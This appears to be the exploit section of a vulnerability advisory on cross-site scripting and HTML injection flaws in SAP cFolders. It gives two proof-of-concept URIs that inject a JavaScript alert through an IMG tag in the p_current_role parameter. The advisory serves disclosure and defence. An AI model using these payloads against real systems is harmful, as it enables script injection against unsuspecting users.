• info
• discussion
• exploit
• solution
• references

SAP cFolders Cross Site Scripting And HTML Injection Vulnerabilities

Attackers can use a browser to exploit these issues. To exploit a cross-site scripting issue, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

https://www.example.com/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>

https://www.example.com/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role= aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>